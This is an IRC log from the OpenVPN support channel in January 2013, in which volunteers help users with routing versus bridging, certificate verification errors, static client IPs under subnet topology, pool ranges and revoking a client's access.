20:00 <+pekster> If any of those exceptions are problems for your setup, I'd suggest using a firewall to supplement the VPN operation to guarantee expected operation
20:06 < kunji> pekster: Hmm, so you're saying that it does work as I expected so long as I am not on the local network and the VPN is up? Well, it shouldn't be hard to verify once I go get on a different network. The description originally sounded more complete than that, even stating the caveat that if your DHCP lease expires you could lose your connection because even the DHCP requests would be routed over the VPN. I would have thought that the DHCP
20:09 <+pekster> Being on the local network merely impacts the route reply traffic takes, *unless* you are performing source-NAT on packets from VPN clients flowing through the server
20:10 <+pekster> Externally, you need to NAT traffic since you're presumably using private IPs
20:11 <+pekster> !redirect
20:11 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server.
or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
20:11 <@vpnHelper> http://ircpimps.org/redirect.png
20:11 <+pekster> kunji: There's a handy explanation and flowchart for you to follow
20:13 < kunji> pekster: you mean the vpn server's public IP, right? So the IP my modem receives... which is indistinguishable for me right now because I am on the local network. But like I was saying it will be easy to check later once I'm on a different network.
20:14 < kunji> pekster: interesting though, I have not enabled IP forwarding, but can ping google.com, you don't need it enabled if you're bridging do you?
20:14 <+pekster> You're bridging to your own local network? Don't do that...
20:15 < kunji> pekster: Hmm, why not?
20:15 <+pekster> Well, at least connecting from inside doesn't do you any good whatsoever
20:15 <+pekster> You just have a "2nd" IP address on the same network. Really pointless
20:16 < kunji> pekster: I know, it's for use from outside, I was just trying to do what testing I can from here, since I'm here now.
20:16 <+pekster> If you're trying to redirect traffic, you should probably be using routing (tun) anyway
20:16 <+pekster> You can't test it at all because of your setup. You could partially test it if you were using tun, not tap
20:16 <+pekster> !tunortap
20:16 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you
20:16 <@vpnHelper> over the vpn or (#4) lan gaming? use tap!
20:16 <+pekster> You really don't want tap for this
20:16 < kunji> But tun won't do for LAN gaming, no? It doesn't do broadcast.
20:17 <+pekster> You never mentioned anything about games requiring broadcasts, just redirecting remote traffic
20:17 <+pekster> My supply of crystal balls is running low
20:18 < kunji> pekster: Sorry man, I didn't mention the games because they're secondary, the primary concern is the remote traffic. Maybe I should just run 2 instances?
20:18 <+pekster> That might be easier, just to keep things nicely separated. tap VPNs are more complex since you're involving both the VPN server and the network you're bridging to
20:19 <+pekster> Many people mistakenly believe that since it's becoming a part of the existing network that it is easier, but they're ignoring the subtle complexities of combining routing requirements with an Ethernet-layer bridge
20:19 <+pekster> Ideally, just turn on IP forwarding, NAT if you're not using public IP space, and use a routed setup when you want to redirect Internet traffic (it's generally cleaner)
20:20 <+pekster> Normally I hate NAT-based solutions, but I assume your local network is *already* doing NAT upstream, so it's a wash either way
20:20 < kunji> pekster: Yeah, that's very much like what I used to do with pptp.
20:20 <+pekster> Also think of this: do you really want all your "gaming" VPN clients to send *all* their upstream traffic (from youtube, bittorrent, downloading linux distros, etc, etc) through your connection?
20:21 < kunji> pekster: Well, for the gaming bit, it would just be for a few friends, so we're talking like 3 connections for something like Age of Empires II for a few hours.
20:22 < kunji> pekster: So it wouldn't be bad, but well, I'm going to experiment a few days, and then I'll come back and bother you if it's not working out :P
20:23 <+pekster> It could be awful if you're using the same 'redirect-gateway' setup there
20:23 <+pekster> Do you have your friends stop any other downloads they might be doing before joining? Just run 2 separate VPNs and I suspect you'll be a lot happier
20:23 <+pekster> Or, what if they join and end up doing a huge steam update? That all gets redirected if you've asked it to ;)
20:24 < kunji> pekster: Their own internets aren't very good, they already shut everything else off when we game, sometimes they even stay off Skype and we have to type all game.
20:29 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn
20:53 -!- Guest29478 [~cosmicgat@113.210.100.30] has joined #openvpn
21:26 -!- Guest29478 [~cosmicgat@113.210.100.30] has left #openvpn []
22:05 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Quit: Leaving]
22:08 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn
23:13 -!- MaxeyPad_ [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has quit [Ping timeout: 255 seconds]
23:22 -!- pa [~pa@unaffiliated/pa] has joined #openvpn
23:39 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn
--- Day changed Fri Jan 11 2013
00:04 -!- eN_Joy [~eN_Joy@jindan.chem.ou.edu] has quit [Ping timeout: 246 seconds]
00:06 -!- eN_Joy [~eN_Joy@jindan.chem.ou.edu] has joined #openvpn
00:13 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has quit [Quit: Computer has gone to sleep.]
00:30 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has joined #openvpn
00:33 -!- moore1 [~moore@50.7.199.107] has joined #openvpn
00:33 -!- moore1 [~moore@50.7.199.107] has left #openvpn []
00:43 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 264 seconds]
00:58 -!- mattock_afk is now known as mattock
01:21 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds]
01:25 -!- brute11k [~brute11k@89.249.235.33] has joined #openvpn
01:27 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn
01:32 -!- brute11k [~brute11k@89.249.235.33] has quit [Quit: Leaving.]
01:35 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn []
01:35 -!- niervol [~krystian@193.106.244.150] has joined #openvpn
02:02 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn
02:04 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
02:36 -!- PeppiX [~PeppiX@89-96-212-226.ip14.fastwebnet.it] has joined #openvpn
02:37 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn
02:38 < PeppiX> hi all
02:38 < PeppiX> I have a question about the latest openvpn release (2.3.0)
02:39 < PeppiX> the addtap binary isn't present
02:39 < PeppiX> how can I add another tap?
02:39 <+pekster> PeppiX: That's a batch script, not a binary, and you need to install the 'tap-windows.exe' program that should be present in your .\bin\ path relative to your install dir
02:39 <+pekster> When you install it, just overwrite the default location (which should already exist) and select the 'Utilities' option that's unchecked by default
02:40 <+pekster> It's on my todo list to submit a patch to the developers so that's installed by default, but it was removed early on in the 2.3 pre-release cycle :\
02:41 -!- zamba [marius@flage.org] has joined #openvpn
02:42 < zamba> when trying to establish an openvpn connection I get the following error:
02:42 < PeppiX> @pekster: thanks
02:42 < zamba> VERIFY ERROR: depth=1, error=self signed certificate in certificate chain: /C=KG/ST=NA/L......
02:43 < zamba> TLS_ERROR: BIO read tls_read_plaintext error: error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed
02:43 < PeppiX> the problem is that I don't have 'tap-windows.exe' in bin (under openvpn)
02:43 < zamba> http://pastie.org/5666688
02:43 < zamba> here's the full error
02:43 < PeppiX> I'll try the install again with 'options' checked :)
02:45 <+pekster> PeppiX: If you bust open the 'openvpn-install-2.3.0-I001-*.exe' file (* will vary depending on the 32 or 64-bit version) with 7-zip, that installer will also be present in the .\$TEMP\ dir.
But I've confirmed it gets installed at \bin\tap-windows.exe in the official 2.3.0 release
02:46 <+pekster> However, in the rc1 and rc2 releases, the installer is *not* present at .\bin\ of the installed program, and only present in the openvpn installer via 7-zip or some other decompressor
02:48 <+pekster> zamba: Looks like the CA file in your config on the side that gives you that 'VERIFY ERROR' message can't tie the certificate the remote peer is presenting to the referenced CA
02:50 <+pekster> The certificate used by the remote peer must be signed by the CA you have a public key for (the CA certificate) on the system performing the verification
02:50 <+pekster> !certverify
02:50 <@vpnHelper> "certverify" is (#1) verify your certs are signed correctly by running `openssl verify -CAfile ` for client.crt and server.crt or (#2) also make sure you use the same ca.crt on both sides by checking their md5
02:51 <+pekster> ^^ zamba, maybe that's helpful?
02:51 < zamba> pekster: ok, I'll check it out
02:51 < zamba> thanks :)
02:51 <+pekster> Here's more generic information:
02:51 <+pekster> !pki
02:51 <@vpnHelper> "pki" is (#1) http://openvpn.net/index.php/open-source/documentation/howto.html#pki for how to make your PKI stuff (ca, and certs) or (#2) Here's a basic rundown of how it works... The server, client, and ca certs are all signed by the same ca.key. The server and client use the ca.crt to check that each other were signed by the right ca.key. Optionally, the client also checks that the server cert was
02:51 <@vpnHelper> signed specially as a server (see !servercert)
02:58 < PeppiX> @pekster I've extracted openvpn-install-2.3.0-I001-*.exe with 7-zip and I found tap-windows.exe
02:58 < PeppiX> now... to add another tap do I have to launch and install tap-windows.exe?
02:59 <+pekster> That's just an installer; the openvpn project installer already installed 'tap-windows' for you, but you need to *reinstall* with the optional "utilities" checkbox checked, which will give you the missing batch scripts
02:59 <+pekster> It's an annoyance that 2.3.0 removed it by default
03:00 < PeppiX> oh yeees
03:00 < PeppiX> done :)
03:00 < PeppiX> now I have 2 taps
03:00 < PeppiX> so I can use 2 vpn certificates at the same time
03:00 < PeppiX> thanks a lot :L)
03:01 <+pekster> No problem :)
03:02 -!- PeppiX [~PeppiX@89-96-212-226.ip14.fastwebnet.it] has quit []
03:03 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 265 seconds]
03:32 -!- dazo_afk is now known as dazo
03:55 -!- folivora [~out@46.19.34.64] has quit [Read error: Connection reset by peer]
03:55 -!- folivora_ [~out@46.19.34.64] has joined #openvpn
04:04 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 264 seconds]
04:06 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 276 seconds]
04:32 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Remote host closed the connection]
04:48 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Ping timeout: 276 seconds]
04:55 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn
04:58 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Read error: Operation timed out]
05:06 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn
05:12 -!- pie__ [~pie_@94-21-58-185.pool.digikabel.hu] has joined #openvpn
05:12 -!- pie__ [~pie_@94-21-58-185.pool.digikabel.hu] has quit [Changing host]
05:12 -!- pie__ [~pie_@unaffiliated/pie-/x-0787662] has joined #openvpn
05:16 -!- pie___ [~pie_@unaffiliated/pie-/x-0787662] has quit [Ping timeout: 272 seconds]
05:30 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has joined #openvpn
06:08 -!- dazo is now known as dazo_afk
06:19 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has quit [Ping timeout: 255 seconds]
06:19 -!- defswork [~andy@141.0.50.105] has quit [Quit: Ex-Chat]
06:31 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit []
06:34 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
06:37 -!- igor__ [~igor@pd907e599.dip0.t-ipconnect.de] has joined #openvpn
06:43 -!- brute11k [~brute11k@89.249.235.33] has joined #openvpn
06:56 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Read error: Connection timed out]
06:57 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn
07:03 -!- pa [~pa@unaffiliated/pa] has joined #openvpn
07:33 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn
08:22 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Quit: leaving]
08:25 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn
08:40 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn
08:46 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has joined #openvpn
09:00 -!- _-Jon-_ [~jon@2607:f2c0:f00f:2100:5054:ff:fe00:884e] has joined #openvpn
09:04 -!- u0m3 [~Radu@92.80.72.203] has joined #openvpn
09:13 -!- _-Jon-_ [~jon@2607:f2c0:f00f:2100:5054:ff:fe00:884e] has quit [Quit: [BX] Reserve your copy of BitchX-1.2c02 for the Apple Newton today!]
09:16 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.]
09:29 -!- pelle2 [~p@nl102-232-231.student.uu.se] has joined #openvpn
09:29 < pelle2> !welcome
09:29 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server.
|| Also interesting: !man !/30 !topology !iporder !sample !forum
09:29 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
09:30 < pelle2> !goal
09:30 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
09:40 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn
09:41 < pelle2> I just want to connect to a vpn server run by a company providing this service to let customers get another IP, but when I try to connect to it, I get an error message in the openvpn log, and since this error message occurred, I can still connect (complete the initiation sequence), but I can't use the connection for actually sending any data through it
09:41 < pelle2> the error message is the following: ERROR: FreeBSD route add command failed: external program exited with error status: 1
09:42 < pelle2> does anyone have a clue as to what could possibly be the cause of this?
09:42 < gladiatr> pelle2, What version of openvpn are you running on your end?
09:45 < gladiatr> the problem stems from running as a non-root user. It should be waiting to drop privileges until after the push options are processed, though.
09:45 < gladiatr> are you using any sort of up script?
09:51 <@ecrist> morning, folks
09:52 < pelle2> well, I'll try to find out, it's the client that comes with pfsense 2.1, so I don't really know straight away
10:01 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds]
10:04 < pelle2> can't find it
10:04 < pelle2> do you think it's possible to fix on the client side or is it something they have changed on the server side?
10:08 < gladiatr> it is a problem on the client side.
10:08 < gladiatr> openvpn isn't in a state where it has the correct privileges to add the required routes
10:09 < gladiatr> (what the error you recounted indicates)
10:10 -!- ether0 [~ether0@72.22.83.65] has quit [Quit: Changing server]
10:16 < pelle2> hm
10:16 < pelle2> strange
10:17 < pelle2> if I knew enough about these kinds of things, I guess I could add the route manually in pfsense
10:17 < gladiatr> I'd ping the pfsense people about it
10:18 < pelle2> yep
10:18 < pelle2> thanks
10:21 -!- master_of_master [~master_of@p57B52A2D.dip.t-dialin.net] has quit [Ping timeout: 255 seconds]
10:23 -!- master_of_master [~master_of@p57B54DDA.dip.t-dialin.net] has joined #openvpn
10:25 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds]
10:28 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
10:31 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer]
10:48 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
10:48 -!- mode/#openvpn [+v s7r] by ChanServ
10:51 < gladiatr> np
10:53 -!- igor__ [~igor@pd907e599.dip0.t-ipconnect.de] has quit [Quit: leaving]
10:57 -!- pelle2 [~p@nl102-232-231.student.uu.se] has quit [Remote host closed the connection]
10:58 -!- pelle2 [~p@nl102-232-231.student.uu.se] has joined #openvpn
11:08 -!- raidz_away is now known as raidz
11:31 -!- pelle2 [~p@nl102-232-231.student.uu.se] has quit [Ping timeout: 276 seconds]
11:33 -!- pelle2 [~p@nl102-232-231.student.uu.se] has joined #openvpn
11:43 -!- Devastator [~devas@186.214.14.25] has joined #openvpn
11:44 -!- Devastator [~devas@186.214.14.25] has quit [Changing host]
11:44 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
11:55 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Ping timeout: 260 seconds]
12:02 -!- DBordello [~DBordello@2607:ff50:0:1a::10] has joined #openvpn
12:02 -!- DBordello [~DBordello@2607:ff50:0:1a::10] has quit [Changing host]
12:02 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn
12:08 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Ping timeout: 260 seconds]
12:13 -!- DBordello [~DBordello@2607:ff50:0:1a::10] has joined #openvpn
12:13 -!- DBordello [~DBordello@2607:ff50:0:1a::10] has quit [Changing host]
12:13 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn
12:15 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn
12:17 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
12:28 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn
12:37 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
12:44 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Ping timeout: 244 seconds]
12:45 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Ping timeout: 260 seconds]
13:13 -!- DBordello [~DBordello@2607:ff50:0:1a::10] has joined #openvpn
13:13 -!- DBordello [~DBordello@2607:ff50:0:1a::10] has quit [Changing host]
13:13 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn
13:21 -!- neverme [neverme@201.80.6.95] has joined #openvpn
13:22 < neverme> I was having a doubt about one thing in the ccd file. For example, I have created the following config file client1 with ifconfig-push 10.8.0.21 10.8.0.22; what I am in doubt about is, will that limit client1 to acquiring the IP ending with 1, or will it get either IP ending .1 or .2?
13:22 < neverme> besides that my default openvpn conf is set to start at .50 to ensure lower numbers won't get auto acquired
13:31 -!- anonymuse [anonymuse@cpe-68-173-27-87.nyc.res.rr.com] has joined #openvpn
13:32 -!- anonymuse is now known as intransit
13:32 -!- intransit is now known as intransit[a]
13:33 -!- intransit[a] is now known as intransit
13:34 -!- intransit is now known as JesseWhite
13:41 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye]
14:01 -!- MeanderingCode [~Meanderin@71-213-184-243.albq.qwest.net] has joined #openvpn
14:02 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn
14:16 < neverme> So, I might be overlooking it, but from what I understood so far, if I want to deliver a static IP to each client I need to create a different network for each? For instance 10.9.1.1 - 10.9.1.2, 10.9.2.1 - 10.9.2.2 and so on, or is there a reusable way to do this using the default IP 10.8.0.0? Or to use it do I need to take into account the unusable IPs, like if I make it 10.8.0.21 - 10.8.0.22 it will also use .20 and .23, so the next would start at .25 - .26?
14:18 <+pekster> !net30
14:18 <@vpnHelper> "net30" is "/30" is (#1) http://openvpn.net/index.php/documentation/faq.html#slash30 explains why routed clients each use 4 ips, or (#2) you can avoid this behavior with by reading !topology
14:20 <+pekster> neverme: OpenVPN allocates a fake /30 to each client to support Windows limitations with older tap drivers; that's not required anymore with subnet topology, and Linux/Unix just uses a PtP configuration within the inside of the /30 anyway
14:21 <+pekster> (and by "tap" driver, I mean the Win32-TAP driver in tun mode; "tap driver" is just the driver name)
14:21 < neverme> !topology
14:21 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions.
or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this.
14:21 < neverme> thanks, will see what I can do
14:22 <+pekster> And, after I just scrolled up to see your earlier question, yes, you can (and should) push static IPs that are outside of your pool range
14:23 <+pekster> When supporting Windows clients in net30 topology, you must push a pair of IPs inside a /30. In subnet mode you push an IP and netmask
14:24 <+pekster> Linux clients can use any 2 IPs. Technically you can even do this (but you should not, for obvious reasons) push "ifconfig 192.168.0.1 10.1.2.3"
14:25 < neverme> I see, thanks a lot :) am looking into the topology option to see what changes I need to make etc, really appreciated
14:28 -!- brute11k [~brute11k@89.249.235.33] has quit [Read error: Connection reset by peer]
14:29 -!- brute11k [~brute11k@89.249.235.33] has joined #openvpn
14:29 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Quit: Ex-Chat]
14:30 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
14:59 < neverme> pekster so I am testing it now, however the client doesn't seem to get the IP, keeps saying TEST ROUTES: 0/0 succeeded
14:59 < neverme> I am using ver 2.3.0
15:01 <+pekster> testing what? It's quite possible to use OpenVPN in a configuration that does not set any routes (hence you will need "0 of 0" network routes added.)
Post some configs, because I have no clue what your setup is
15:06 < neverme> my server conf http://pastebin.com/5kDAQVEe my client1 ccd is "ifconfig-push 10.8.0.21 10.8.0.22" without double-quotes, my client1 config is equal to the sample file except I changed the IP it needs to connect to
15:07 < neverme> I'm running the basic conf and am trying to assign IPs 21~30 to 10 PCs
15:07 <+pekster> The 2nd argument to 'ifconfig-push' needs to be a subnet mask, not an IP
15:08 <+pekster> See the --ifconfig-push and --ifconfig parameters in the manpage for usage details, but you need a netmask there (so, 255.255.255.0 in your setup)
15:08 < neverme> I see, so when I use topology subnet it must be the netmask?
15:08 <+pekster> Yup
15:08 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn
15:08 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host]
15:08 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn
15:08 < neverme> and should I still use it as 252 or as 0? because there will be more than 1 sequential IP
15:08 <+pekster> You directly set a /24 netmask in subnet topology
15:09 <+pekster> The /30 stuff is for net30 topology only
15:11 < neverme> pekster sweet, it's working like a charm now, and yes it makes sense now, I was a bit confused because with the default /30 it asked me for the IPs
15:11 < neverme> thanks a lot for taking the time to help this noob ;)
15:12 <+pekster> np. Some other small suggestions: get rid of the 'ifconfig-pool-persist' option; it's mostly worthless, and can potentially cause issues (edge cases, but I've seen reports of them when duplicate IPs or something get in there, for w/e reason.)
Also, if you're supporting clients that get pool IPs (ie: not statically set in ccd files) you should set your ifconfig-pool range outside the static range
15:14 < neverme> yeah I am using .21 to .30 and the pool starts at .50
15:15 <+pekster> Not in that server setup it doesn't
15:15 < neverme> will remove the pool persist, it was originally from the default config
15:15 <+pekster> The 'server' directive expands internally (see --server in the manpage for details) to use the entire range minus the IP for the server and reserved network/"broadcast" IPs
15:15 < neverme> oh, yes you're right, I was reading the bridge option
15:16 <+pekster> You can override the pool range by defining your own ifconfig-pool directive below the 'server' directive
15:16 < neverme> will do that now, thanks a lot ;)
15:16 <+pekster> I think (I don't generally use the server directive - you might actually need to expand the server directive yourself. I'm not sure on that point, actually)
15:19 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn
15:22 < neverme> per man ifconfig-pool 10.8.0.2 10.8.0.254 255.255.255.0 so it should be fine if I just add below it ifconfig-pool 10.8.0.50 10.8.0.100 255.255.255.0 right?
15:23 < neverme> below the server*
15:23 -!- [1]JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn
15:25 <+pekster> I guess not: Options error: --server already defines an ifconfig-pool, so you can't also specify --ifconfig-pool explicitly
15:25 <+pekster> So, expand the server directive yourself
15:25 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Quit: Leaving]
15:27 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Ping timeout: 276 seconds]
15:32 < neverme> pekster I'm rather confused by "expand" it; by that do you mean manually change the startup script and/or manually start the server by defining my own ifconfig and ifconfig-pool?
15:33 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 17.0.1/20121128204232]]
15:34 -!- Mimiko [~Mimiko@89.28.88.177] has joined #openvpn
15:40 -!- MeanderingCode [~Meanderin@71-213-184-243.albq.qwest.net] has quit [Read error: Connection reset by peer]
15:43 <+pekster> neverme: Expand the directive. So instead of using "server 10.8.0.0 255.255.255.0" define 'mode server' 'tls-server' 'push "topology subnet"' 'ifconfig 10.8.0.1 255.255.255.0' 'push "route-gateway 10.8.0.1"' 'ifconfig-pool 10.8.0.50 10.8.0.254'
15:43 <+pekster> etc
15:44 <+pekster> Just read the --server example in the manpage; it shows you all the expansion you would need to do
15:54 < neverme> aha, now I understand it. The slight change I had to make was server 10.8.0.1 10.8.0.2 rather than netmask; besides that it seems to be working just fine with it, the pool is working 50 and above and the static IPs are setting just fine. thanks a lot
16:00 -!- brute11k [~brute11k@89.249.235.33] has quit [Quit: Leaving.]
16:02 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit []
16:03 -!- neverme [neverme@201.80.6.95] has quit [Quit: Leaving]
16:05 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
16:12 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn
16:16 -!- Mimiko [~Mimiko@89.28.88.177] has quit []
16:18 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 255 seconds]
16:19 -!- Mimiko [~Mimiko@89.28.88.177] has joined #openvpn
16:21 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit []
16:44 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Quit: Leaving]
16:47 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 240 seconds]
16:50 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn
16:58 -!- staticsafe [~staticsaf@unaffiliated/staticsafe] has left #openvpn ["WeeChat 0.3.9.2"]
16:59 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Read error: Operation timed out]
17:09 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn
17:15 -!- Mimiko [~Mimiko@89.28.88.177] has quit []
17:24 -!- Devastator [~devas@186.214.111.24] has joined #openvpn
17:24 -!- Devastator [~devas@186.214.111.24] has quit [Changing host]
17:24 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
17:27 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Quit: Leaving]
18:00 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
18:19 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 244 seconds]
19:13 -!- raidz is now known as raidz_away
19:13 -!- blackness [~black@mobile.blackmajic.org] has joined #openvpn
19:37 -!- crhylove [~rthornton@grps-edge-4.visp.net] has joined #openvpn
19:37 < crhylove> Hi, I'm trying to get a Linux Mint laptop onto my corporate vpn.
19:37 < crhylove> Any idea what settings to use under advanced?
19:38 <+rob0> Not sure what you're asking, but it's probably something about your GUI/frontend, not openvpn itself.
19:39 <+rob0> Ask your VPN administrator how to configure the client.
19:43 < crhylove> Yeah, he's lagging. :)
19:45 -!- u0m3 [~Radu@92.80.72.203] has quit [Read error: Connection reset by peer]
20:05 < crhylove> OK, got my vpn setup.
20:05 < crhylove> What's the best rdp client these days?
20:05 < crhylove> remmina?
20:08 < crhylove> I see freerdp-x11, but I don't see a shortcut for it, and it doesn't launch from the terminal
20:08 < crhylove> :/
20:29 -!- swat [~swat@ubuntu/member/swat] has quit [Quit: Leaving.]
20:44 -!- crhylove [~rthornton@grps-edge-4.visp.net] has quit [Quit: Leaving]
20:44 -!- CrashTM [~CrashTM@69.162.93.219] has joined #openvpn
20:45 -!- clu5ter [~staff@unaffiliated/clu5ter] has quit [Ping timeout: 240 seconds]
20:45 < CrashTM> is it possible to disable an openvpn connection that i gave to someone?
20:47 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn
20:53 < blackness> http://paste.blackmajic.org:81/index.php?show=28 this describes my problem in some detail. both systems in this are debian squeeze..any ideas on why im having TLS issues?
21:16 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn
21:23 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit []
21:51 <+rob0> CrashTM, either revoke the certificate (and use your CRL on the server), or use --ccd-exclusive.
22:08 <+pekster> There's also a 'disable' option you can put in a ccd file specifically for the disabled cert, although it's considered more proper to revoke and generate a CRL if this is a permanent revocation
22:11 -!- CrashTM [~CrashTM@69.162.93.219] has quit [Read error: Connection reset by peer]
22:15 < blackness> i got OpenVPN to connect, but when i try using it i cannot connect to anything but i can resolve hosts just fine just cant 'talk' to remote systems, any ideas why?
22:17 <+pekster> My guess is that your DNS is still using your LAN, yet you have redirected traffic across the VPN where the remote endpoint fails to properly send it upstream
22:17 <+pekster> Post your server & client config files for further analysis:
22:17 <+pekster> !config
22:17 <@vpnHelper> (config []) -- If is given, sets the value of to . Otherwise, returns the current value of . You may omit the leading "supybot." in the name if you so choose.
22:17 <+pekster> Not that, let's try this one:
22:17 <+pekster> !configs
22:17 < blackness> one second..ill paste.
